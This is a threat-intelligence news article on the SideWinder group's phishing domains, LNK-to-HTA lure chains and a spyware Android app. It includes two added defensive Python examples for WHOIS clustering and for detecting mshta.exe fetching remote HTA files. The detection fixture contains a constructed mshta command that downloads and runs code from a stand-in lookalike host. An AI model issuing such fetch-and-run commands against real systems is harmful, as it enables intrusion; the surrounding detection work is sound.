Cybersecurity researchers have uncovered a previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to target entities located in Pakistan and China.
It comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity firms Group-IB and Bridewell said in a joint report shared with The Hacker News.
“The identified phishing domains impersonate various organizations in the news, government, telecommunications and financial sectors,” researchers Nikita Rostovtsev, Joshua Penny and Yashraj Solanki said.
SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as the intrusion mechanism to gain a foothold in targeted environments.
The group’s targeting is widely believed to reflect Indian espionage interests. The countries most frequently attacked include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar and Singapore.
Earlier this February, Group-IB disclosed evidence that SideWinder may have targeted 61 government, military, law enforcement and other organizations across Asia between June and November 2021.
More recently, the nation-state group was observed utilizing a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.
The newly discovered domains mimic government organizations in Pakistan, China, and India, and are linked to one another by the use of the same values in their WHOIS records and by otherwise similar registration information.
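Linking domains through shared WHOIS values is the pivoting step the paragraph above describes. The following is an added example, not code from the report or from either firm, showing how a defender can cluster a set of registration records by shared registrant email and name server. The records, field names and domains are constructed for the example; real WHOIS data is usually redacted and noisier, and a registrar alone is too weak a pivot, so it is reported here only as supporting evidence rather than used to join clusters.

```python
from collections import defaultdict

# Constructed WHOIS records (field names and values are assumptions, not from the report).
RECORDS = [
    {"domain": "example-gov-portal.test", "registrant_email": "reg1@example.test",
     "name_server": "ns1.host-a.test", "registrar": "Registrar A"},
    {"domain": "example-telecom-mail.test", "registrant_email": "reg1@example.test",
     "name_server": "ns1.host-a.test", "registrar": "Registrar A"},
    {"domain": "example-bank-login.test", "registrant_email": "reg2@example.test",
     "name_server": "ns1.host-a.test", "registrar": "Registrar B"},
    {"domain": "unrelated-site.test", "registrant_email": "other@example.test",
     "name_server": "ns9.host-z.test", "registrar": "Registrar C"},
]

# Strong pivots join clusters; weak ones (registrar) are only listed as evidence.
STRONG_FIELDS = ("registrant_email", "name_server")
WEAK_FIELDS = ("registrar",)


def pivot_index(records, fields):
    """Map each (field, value) pair to the set of domains that share it."""
    index = defaultdict(set)
    for rec in records:
        for field in fields:
            value = rec.get(field)
            if value:
                index[(field, value.lower())].add(rec["domain"])
    return index


def cluster_domains(records, fields=STRONG_FIELDS):
    """Union-find clustering: any two domains sharing a strong pivot value end up together.

    Returns a list of clusters (each a sorted list of domains), largest first.
    """
    parent = {rec["domain"]: rec["domain"] for rec in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path compression
            x = parent[x]
        return x

    def union(a, b):
        root_a, root_b = find(a), find(b)
        if root_a != root_b:
            parent[root_b] = root_a

    for (_, _), domains in pivot_index(records, fields).items():
        domains = sorted(domains)
        if len(domains) >= 2:  # a value seen on only one domain links nothing
            for other in domains[1:]:
                union(domains[0], other)

    clusters = defaultdict(set)
    for domain in parent:
        clusters[find(domain)].add(domain)
    return sorted((sorted(c) for c in clusters.values()), key=len, reverse=True)


def link_evidence(records, fields=STRONG_FIELDS + WEAK_FIELDS):
    """For each pair of domains, list the (field, value) pairs they share.

    Weak fields are included here so an analyst can see them, even though
    cluster_domains() does not join on them.
    """
    evidence = defaultdict(list)
    for (field, value), domains in pivot_index(records, fields).items():
        domains = sorted(domains)
        for i, a in enumerate(domains):
            for b in domains[i + 1:]:
                evidence[(a, b)].append((field, value))
    return dict(evidence)


if __name__ == "__main__":
    for cluster in cluster_domains(RECORDS):
        print("cluster:", cluster)
    for pair, shared in sorted(link_evidence(RECORDS).items()):
        print(pair, "share", shared)
```

On the constructed records the three lookalike domains fall into one cluster (two share a registrant email, all three share a name server) while the unrelated domain stays alone; `link_evidence()` additionally surfaces the shared registrar between the first two as corroborating, but not decisive, context.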
Hosted on some of these domains are government-themed lure documents designed to download unknown next-stage payloads.
Most of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One of them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which QiAnXin and BlackBerry have analyzed in recent months.
Also found were Windows shortcut (LNK) files uploaded to VirusTotal from Beijing in late November 2022. The LNK files, for their part, were engineered to run HTML Application (HTA) files retrieved from a remote server that spoofed Tsinghua University email systems (mailtsinghua.sinacn(.)co).
Another LNK file uploaded to VirusTotal around the same time from Kathmandu used a similar method to retrieve an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov(.)org).
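The two LNK chains above share one observable that a defender can key on: a shortcut that launches the HTA host (`mshta.exe` on Windows) with a remote URL, where the host name imitates a legitimate institution. The following is an added example, not code from the report, that runs that check over constructed process-creation events. The Sysmon-style field names, the events, the lookalike host and the brand-to-legitimate-domain map are all assumptions made for the example.

```python
import json
import re
from urllib.parse import urlparse

# Constructed process-creation events (Sysmon-style field names are assumptions).
EVENTS = [
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "mshta.exe http://mail-exampleuniv.lookalike.test/update.hta"}),
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"}),
    json.dumps({"Image": r"C:\Windows\System32\notepad.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "notepad.exe notes.txt"}),
]

# Constructed map of brand token -> the domain that legitimately owns it.
PROTECTED_BRANDS = {"exampleuniv": "exampleuniv.edu.test"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def remote_url(command_line):
    """Return the first http(s) URL in a command line, or None."""
    match = URL_RE.search(command_line)
    return match.group(0) if match else None


def is_lookalike(host, brands=PROTECTED_BRANDS):
    """Return the brand token a host imitates if it contains the token but is
    not the legitimate domain or a subdomain of it; otherwise None."""
    host = host.lower()
    for token, legit in brands.items():
        if token in host and not (host == legit or host.endswith("." + legit)):
            return token
    return None


def analyze(event_json):
    """Flag mshta.exe launched with a remote HTA; enrich with a lookalike verdict.

    A local .hta path is deliberately not flagged here: that is a lower-severity
    case and would be a separate rule.
    """
    event = json.loads(event_json)
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return None
    url = remote_url(event.get("CommandLine", ""))
    if url is None:
        return None
    host = urlparse(url).hostname or ""
    finding = {
        "rule": "mshta_remote_hta",
        "parent": event.get("ParentImage", ""),
        "url": url,
        "host": host,
    }
    brand = is_lookalike(host)
    if brand:
        finding["lookalike_of"] = brand
    return finding


def scan(events):
    """Run analyze() over a sequence of JSON event strings and keep the hits."""
    return [finding for finding in map(analyze, events) if finding]


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(json.dumps(finding, indent=2))
```

Only the first event is flagged: it is the HTA host fetching a remote file from a host that carries the protected brand token without sitting under the legitimate domain. The second event uses a local HTA and is left for a separate, lower-severity rule, and the third is unrelated. In production the brand map would be the organization's own names and the institutions it corresponds with, and the parent-process field is worth keeping in the finding because a shortcut opened by the user typically shows `explorer.exe` as the parent.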
Further investigation of SideWinder’s infrastructure led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.
The rogue Android app poses as a “Ludo Game” and asks the user to grant it access to contacts, location, phone logs, SMS messages and the calendar, effectively functioning as spyware capable of harvesting sensitive information.
Group-IB said the app also showed similarities to a fake Secure VPN app that the company disclosed in June 2022 as being distributed to targets in Pakistan through a traffic distribution system (TDS) called AntiBot.
Taken together, the infrastructure points to SideWinder directing its attention to financial, government and law enforcement organizations, as well as companies specializing in e-commerce and mass media, in Pakistan and China.
“Like many other APT groups, SideWinder relies on targeted spear-phishing as an initial vector,” the researchers said. “That’s why it’s important for organizations to implement a business email protection solution that blocks malicious content.”